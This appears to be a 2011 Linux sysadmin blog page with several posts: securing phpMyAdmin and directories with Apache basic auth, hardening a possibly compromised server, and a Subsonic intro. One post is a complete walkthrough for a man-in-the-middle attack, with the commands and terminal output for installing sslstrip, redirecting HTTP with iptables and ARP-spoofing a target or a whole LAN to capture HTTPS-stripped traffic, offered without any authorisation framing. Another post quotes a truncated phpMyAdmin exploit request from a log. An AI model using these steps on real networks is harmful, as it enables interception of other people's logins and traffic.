Web Server

Securing phpMyAdmin

Saturday, 17 December 2011 07:20 Written by Michael Wood

These instructions were perfomed on an Ubuntu 11.10 machine via SSH.
So, I was messing around with phpMyAdmin and noticed the directory
/usr/share/phpmyadmin/setup. I browse to
http://mydomainname.com/phpmyadmin/setup
and it immediately asks for credentials to login. First, phpMyAdmin
has already been setup...why leave the setup directory on the server
when it's not needed?

I then delete the setup folder from /usr/share/phpmyadmin/setup
sudo rm -rf /usr/share/phpmyadmin/setup

Now, by default you can simply just access the web interface of
phpMyAdmin by browsing to http://mydomainname.com/phpmyadmin
I want this directory on my server to have an extra layer of
protection. I know that you have to login to the phpMyAdmin interface
first, but I'm a security conscience guy. Why not have more security
added when you can?

We will take a look at the phpMyAdmin default Apache configuration file.
I browse to the directory /etc/phpmyadmin and take a look at the file
apache.conf

Here is the output of apache.conf:
# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

Options FollowSymLinks
DirectoryIndex index.php

AddType application/x-httpd-php .php

php_flag magic_quotes_gpc Off
php_flag track_vars On
php_flag register_globals Off
php_admin_flag allow_url_fopen Off
php_value include_path .
php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp
php_admin_value open_basedir
/usr/share/phpmyadmin/:/etc/

phpmyadmin/:/var/lib/phpmyadmin/

# Authorize for setup

AuthType Basic
AuthName "phpMyAdmin Setup"
AuthUserFile /etc/phpmyadmin/htpasswd.setup

Require valid-user

# Disallow web access to directories that don't need it
libraries>
Order Deny,Allow
Deny from All

lib>
Order Deny,Allow
Deny from All

Ok, so what I'm going to try and accomplish here is load the module
"mod_authn_file.c" (this is like adding a .htacess file into the
/usr/share/phpmyadmin directory)

Here is my edited /etc/phpmyadmin/apache.conf file:
Note: If you notice I have added lines starting below "DirectoryIndex index.php"
In the line "AuthUserFile /data/user-access/.htpasswd" this is where
my default .htpasswd file is for my .htaccess files. If you want to
see how this works and is setup check out the article here:
https://codersresource.com/linux/web-server/controlling-directory-access-with-an-htaccess-file
I also commented out all the lines under the "Authorize setup" section
(no need for it)

# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

Options FollowSymLinks
DirectoryIndex index.php

AuthType Basic
AuthName "Restricted Access!"
AuthUserFile /data/user-access/.htpasswd

Require valid-user

AddType application/x-httpd-php .php

php_flag magic_quotes_gpc Off
php_flag track_vars On
php_flag register_globals Off
php_admin_flag allow_url_fopen Off
php_value include_path .
php_admin_value upload_tmp_dir /var/lib/phpmyadmin/tmp
php_admin_value open_basedir
/usr/share/phpmyadmin/:/etc/phpmyadmin/:/var/lib/phpmyadmin/

# Authorize for setup
#
#
# AuthType Basic
# AuthName "phpMyAdmin Setup"
# AuthUserFile /etc/phpmyadmin/htpasswd.setup
#
# Require valid-user
#

# Disallow web access to directories that don't need it
libraries>
Order Deny,Allow
Deny from All

lib>
Order Deny,Allow
Deny from All

After you have made the changes above, save the file. Then restart Apache:
sudo /etc/init.d/apache2 restartf

Now if you browse to http://mydomainname.com/phpmyadmin Apache will
prompt you for a username and password...just an extra layer of
security ;)

Controlling directory access with an .htaccess file

Saturday, 17 December 2011 07:13 Written by Michael Wood

A very quick and easy way to control directory access is to create an .htaccess file. The .htaccess file contains information to require valid user credentials to access whatever directory you put your .htaccess file in.

First, we have to create the .htpasswd file. This file contains the username and hash of the password.

Example output of the .htpasswd file would look like this:

user:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.\

user2:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.

user3:$apr1$ROvNIWjo$96bOcy.gSiVuMlD9jphYO.

To creat the file run this command:
sudo htpasswd -c .htpasswd <username>
It will ask you for a password.

To add users to an existing .htpasswd file:
sudo htpasswd .htpasswd <username>
Again, it will ask you for a password

I usually create a directory outside my document root (where my web sites are stored) called user-access
So, in my case the document root is located at /data/www
I will create the directory user-access in /data

Run this command:
sudo mkdir /data/user-access

Ok. Remember above when we created the .htpasswd file? Move it to the new directory you just created /data/user-access
If I had created the file in my home directory it would be something like this:
sudo mv /home/user/.htpasswd /data/user-access

Now we are going to create the .htaccess file. I want to restrict users from accessing a download directory on my server.

The directory in question is:
/data/www/downloads

I'm going to change to this directory and create the .htaccess file:
cd /data/www/downloads

Create the .htaccess file:
sudo vi .htaccess

Here is an example of what mine looks like:

AuthUserFile /data/user-access/.htpasswd
AuthName "Restricted Access - Valid User Credentials Required"
AuthType Basic

Require valid-user
Order allow,deny
Satisfy any

The line AuthUserFile /data/user-access/.htpasswd this is telling the .htaccess file where to look for the .htpasswd file we created
earlier. It won't work if you don't set this file path correctly.

The line AuthName "Restricted Access - Valid User Credentials Required" anything wrapped in quotes can be changed to whatever you decide.

The line Requre valid-user is simply just saying it will accept any user you created with the .htpasswd file. If you want to restrict it to just a single user, you can change that line to Require user <username> (without brackets)

Restart Apache (this command will differ from the particular Linux distribution you have installed):
sudo /etc/init.d/apache2 restart

You can use this .htaccess file to pretty much control access to any web directory now. No need to modify anything in it, just move it to whatever directory you want to control access to.

Setting up sslstrip for man in the middle attacks

Saturday, 17 December 2011 06:27 Written by Michael Wood

This tutorial will show you how to setup sslstrip. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.

Aren't you excited?!

Open a terminal window

Download sslstrip from:
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

With this command:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
--2011-12-05 01:35:11--
http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Resolving www.thoughtcrime.org... 72.14.190.145
Connecting to www.thoughtcrime.org|72.14.190.145|:80... connected.

HTTP request sent, awaiting response... 200 OK
Length: 22198 (22K) [application/x-gzip]
Saving to: `sslstrip-0.9.tar.gz'

100%[====================================================================================>]
22,198 --.-K/s in 0.07s

2011-12-05 01:35:11 (306 KB/s) - `sslstrip-0.9.tar.gz' saved [22198/22198]
#END TERMINAL OUTPUT

Extract the package "sslstrip-0.9.tar.gz" with the following command:
tar -zxvf sslstrip-0.9.tar.gz

#BEGIN TERMINAL OUTPUT
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
#END TERMINAL OUTPUT

You also need to make sure you have python 2.5 or greater and the python "twisted web" module installed.
Install them like this:
apt-get install python python-twisted-web

In my case they were already installed:

#BEGIN TERMINAL OUTPUT
root@bt:~# apt-get install python python-twisted-web
Reading package lists... Done
Building dependency tree
Reading state information... Done
python is already the newest version.
python-twisted-web is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 38 not upgraded.
#END TERMINAL OUTPUT

Now change to the "sslstrip-0.9" directory:
cd sslstrip-0.9

#BEGIN TERMINAL OUTPUT
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# ls
COPYING lock.ico README setup.py sslstrip sslstrip.py
#END TERMINAL OUTPUT

Run the command:
python ./setup.py install

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# python ./setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-2.6
creating build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py ->
build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-x86_64-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-x86_64-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/CookieCleaner.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnectionFactory.py
-> /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/StrippingProxy.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/ClientRequest.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/__init__.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/DnsCache.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/SSLServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-x86_64-2.6/sslstrip/URLMonitor.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py
to CookieCleaner.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py
to ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py
to ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py
to StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py
to ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py
to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py
to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py
to SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py
to URLMonitor.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
#END TERMINAL OUTPUT

Now we need to turn on IP forwarding, run this command:
echo "1" > /proc/sys/net/ipv4/ip_forward

Ok, iptables has got to be setup to redirect HTTP traffic to sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>

Change the <listenPort> above to an ephemeral port. Something like 30000 should do.
So it should look like this:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 30000

Now we are going to execute sslstrip, run this command:
sslstrip -a -l 30000 -w secret.log

The listening port will be whatever you chose for iptables to redirect HTTP traffic too.

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip -a -l 30000 -w secret.log

sslstrip 0.9 by Moxie Marlinspike running...
#END TERMINAL OUTPUT

Notice above in the terminal output. Don't kill the terminal session. sslstrip is running!

Open a new terminal window.

Now we need to setup arpspoof so the network will think you are the gateway or router. This way all traffic is sent to your machine first, then forwarded to the proper gateway on your network.
arpspoof -i <interface> -t <targetIP> <gatewayIP>

If you don't know your interface setting, just run a quick "ifconfig"
command and it will list it. The <gatewayIP> is the networks real
gateway/router, this is the traffic we want to hijack.
If you want arpspoof to intercept traffic across the whole LAN run:
arpspoof -i <interface> <gatewayIP>

So, I would run the command like this:
arpspoof -i eth0 -t 10.10.1.20 10.10.1.254

#BEGIN TERMINAL OUTPUT
root@bt:~# arpspoof -i eth0 10.10.1.254
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
0:c:29:39:6c:79 ff:ff:ff:ff:ff:ff 0806 42: arp reply 10.10.1.254 is-at
0:c:29:39:6c:79
#END TERMINAL OUTPUT

Notice above in the terminal output, you will constantly receive arp
replies, just let it run. Don't kill the terminal session.

If you need additional help just run:
sslstrip --help

#BEGIN TERMINAL OUTPUT
root@bt:~/sslstrip-0.9# sslstrip --help

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and
from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
#END TERMINAL OUTPUT

That's it...have fun!

Tips on securing a compromised Linux Server

Saturday, 17 December 2011 05:32 Written by Michael Wood

Here lately, I have seen tons of web applications get exploited. Just by individuals not updating 3rd party extensions or applying patches.If you take security seriously you should do these things. Most people are afraid of other things breaking when they update, so theyjust leave it alone. It introduces attack vectors for that particular server. My philosophy behind it all is, update your servers. If something breaks, it can be fixed. Would you rather take a little more time and do things right, or let your server get compromised?

Here are some ways to check for signs of your server being hacked:
A favorite place for bots to hide are in /tmp and in /var/tmp/ or /dev/shm/ or in a users home directory. Sometimes it may be hidden like /tmp/". ."/ or similar. Keep a copy of it, you may be able to look at the code to see where the attack originated from.

So make sure you check these directories, run:
ls -l -a

This will list all files, including hidden files. Also, take note of the timestamps on the files.

You may also be able to find bots hiding by running the following commands:
find / -exec grep -l "sybnc" {} +
find / -name "*.set" | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq
find / -name "inst" | perl -pe 's/.\/\w+-(\w+)-.*/$1/' | sort | uniq

Check to see if netstat finds any remote connections between the port range 6660-7000:
netstat -tanp

My server isn't compromised, but here is what the output should look like if you run command above:

#BEGIN TERMINAL OUTPUT
root@bt:~# netstat -tanp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address
State PID/Program name
tcp 0 0 127.0.0.1:7175 0.0.0.0:*
LISTEN 1205/postgres
tcp 0 0 0.0.0.0:80 0.0.0.0:*
LISTEN 1264/apache2
tcp 0 0 127.0.0.1:631 0.0.0.0:*
LISTEN 1100/cupsd
tcp6 0 0 ::1:7175 :::*
LISTEN 1205/postgres
tcp6 0 0 ::1:631 :::*
LISTEN 1100/cupsd
#END TERMINAL OUTPUT

If you do find a connection to a remote port within the ranges of 6660-7000, run this command to find out what user/process it is running under:
lsof -i tcp:

Replace above with one you want to investigate.

Start looking for any suspicious entries in your Apache error log associated with the timestamps of the files, if you found any, in /tmp, /var/tmp/ or /dev/shm/ or in a users home directory.

Here is an example of a suspicious entry:
217.170.53.79 - - [03/Dec/2011:19:48:13 +0100] "POST /phpmyadmin/index.php?session_to_unset=123token=42..._SESSION[!bla]=%7Cx...

This one exploited phpMyAdmin. Take a look at the article located here http://pastebin.com/DUBeKQv5 on how to secure phpMyAdmin.

Setup Fail2ban. Fail2ban scans log files like /var/log/pwdfail or /var/log/apache/error_log and bans IP addresses that make too many
password failures. It updates firewall rules to reject the IP address.

Implement OSSEC-HIDS http://www.ossec.net with inotify() to watch changes to your system and Apache directories including those that are HTTP writable.

Another good security step is to mount /tmp with noexec,nosuid,nodev
Here's how:

Check to see if your fstab has a /tmp file mounting option:
cat /etc/fstab | grep /tmp

The command above will display NO output if you do not have /tmp
mounted in its own partition.

cd /dev

Now we are going to create a 100MB file for our /tmp partition:
dd if=/dev/zero of=tmpMnt bs=1024 count=100000

#BEGIN TERMINAL OUTPUT
root@bt:/dev# dd if=/dev/zero of=tmpMnt bs=1024 count=100000
100000+0 records in
100000+0 records out
102400000 bytes (102 MB) copied, 0.535322 s, 191 MB/s
#END TERMINAL OUTPUT

Next make an extended filesystem for the tmpMnt file:
mke2fs /dev/tmpMnt

#BEGIN TERMINAL OUTPUT
root@bt:/dev# mke2fs /dev/tmpMnt
mke2fs 1.41.11 (14-Mar-2010)
/dev/tmpMnt is not a block special device.
Proceed anyway? (y,n) y
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
Stride=0 blocks, Stripe width=0 blocks
25064 inodes, 100000 blocks
5000 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67371008
13 block groups
8192 blocks per group, 8192 fragments per group
1928 inodes per group
Superblock backups stored on blocks:
8193, 24577, 40961, 57345, 73729

Writing inode tables: done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 21 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.
#END TERMINAL OUTPUT

Now backup your /tmp directory:
cp -R /tmp /tmp_backup

Check ownership of the files in your /tmp directory, make sure you
keep a note of this:
ls -al /tmp

#BEGIN TERMINAL OUTPUT
root@bt:/# ls -al /tmp
total 52
drwxrwxrwt 11 root root 4096 2011-12-05 11:45 .
drwxr-xr-x 30 root root 4096 2011-12-05 12:39 ..
drwxrwxrwt 2 root root 4096 2011-12-05 11:45 .ICE-unix
drwx------ 2 root root 4096 2011-12-05 11:45 kde-root
drwx------ 2 root root 4096 2011-12-05 11:45 ksocket-root
drwx------ 2 root root 4096 2011-12-05 11:45 orbit-root
drwx------ 2 root root 4096 2011-12-05 11:45 pulse-I5uG1yhc3uav
-rw------- 1 root root 141 2011-12-05 11:44 serverauth.wrvKiuVkuy
drwx------ 2 root root 4096 2011-12-05 11:44 ssh-dFpQYr1373
drwx------ 2 root root 4096 2011-12-05 11:45 vmware-root
drwxr-xr-x 2 root root 4096 2011-12-05 11:44 .winbindd
-r--r--r-- 1 root root 11 2011-12-05 11:44 .X0-lock
drwxrwxrwt 2 root root 4096 2011-12-05 11:44 .X11-unix
#END TERMINAL OUTPUT

Now modify your /etc/fstab file to mount the new partition:
vi /etc/fstab

and insert this line at the bottom:
/dev/tmpMnt /tmp ext2 loop,nosuid,noexec,nodev,noatime,rw 0 0

What the file should look like (this may differ from what you already
have, but the relevance is the line at the bottom):
# /etc/fstab: static file system information.
#
# Use 'blkid -o value -s UUID' to print the universally unique identifier
# for a device; this may be used with UUID= as a more robust way to name
# devices that works even if disks are added and removed. See fstab(5).
#
#
proc /proc proc nodev,noexec,nosuid 0 0
# / was on /dev/sda1 during installation
UUID=03718980-9d4b-41eb-b8d6-a64c2c4b2017 / ext4
errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=c7517411-ea02-4002-b641-9651ccf6e046 none swap sw
0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
/dev/tmpMnt /tmp ext2 loop,nosuid,noexec,nodev,noatime,rw 0 0

Now we are going to mount the new filesystem we created with loop,nosuid,noexec,nodev,noatime:
mount -o loop,nosuid,noexec,nodev,noatime,rw /dev/tmpMnt /tmp

Run this command to chmod /tmp:
chmod 1777 /tmp

For precautions, run the remount command to display any errors (no ouput will be displayed if there are not any errors):
mount -o remount /tmp

Now copy everything back from the /tmp_backup directory to the new /tmp partition:
cp -R /tmp_backup/* /tmp/

Check to make sure everything was copied correctly:
ls -al /tmp

#BEGIN TERMINAL OUTPUT
root@bt:/# ls -al /tmp
total 24
drwxrwxrwt 9 root root 1024 2011-12-05 12:50 .
drwxr-xr-x 30 root root 4096 2011-12-05 12:39 ..
drwx------ 2 root root 1024 2011-12-05 12:50 kde-root
drwx------ 2 root root 1024 2011-12-05 12:50 ksocket-root
drwx------ 2 root root 12288 2011-12-05 12:38 lost+found
drwx------ 2 root root 1024 2011-12-05 12:50 orbit-root
drwx------ 2 root root 1024 2011-12-05 12:50 pulse-I5uG1yhc3uav
-rw------- 1 root root 141 2011-12-05 12:50 serverauth.wrvKiuVkuy
drwx------ 2 root root 1024 2011-12-05 12:50 ssh-dFpQYr1373
drwx------ 2 root root 1024 2011-12-05 12:50 vmware-root
#END TERMINAL OUTPUT

Remove the backup directory:
rm -rf /tmp_backup

Remove /var/tmp:
rm -rf /var/tmp

Create a symbolic link to /tmp:
ln -s /tmp /var/tmp

So, there you have ways to check for a compromised system and a few tweaks to security. Have fun!

Setting up a Subsonic Media Server on Linux

Friday, 02 December 2011 02:21 Written by Michael Wood

First off, Subsonic is a free, web-based media streamer, providing ubiquitous access to your music. Use it to share your music with friends, or to listen to your own music while at work. You can stream to multiple players simultaneously, for instance to one player in your kitchen and another in your living room.

Has really cool features
-An intuitive web interface
-The developer wrote a Subsonic app for the Android platform to stream music to your phone! (Subsonic for Android)
-iPhone users also have cool apps to stream music from a Subsonic server. (iSub, Z-Subsonic, SubStream)
-Pulls in cover art from the Internet by parsing ID3 tags from your audio files
The list goes on...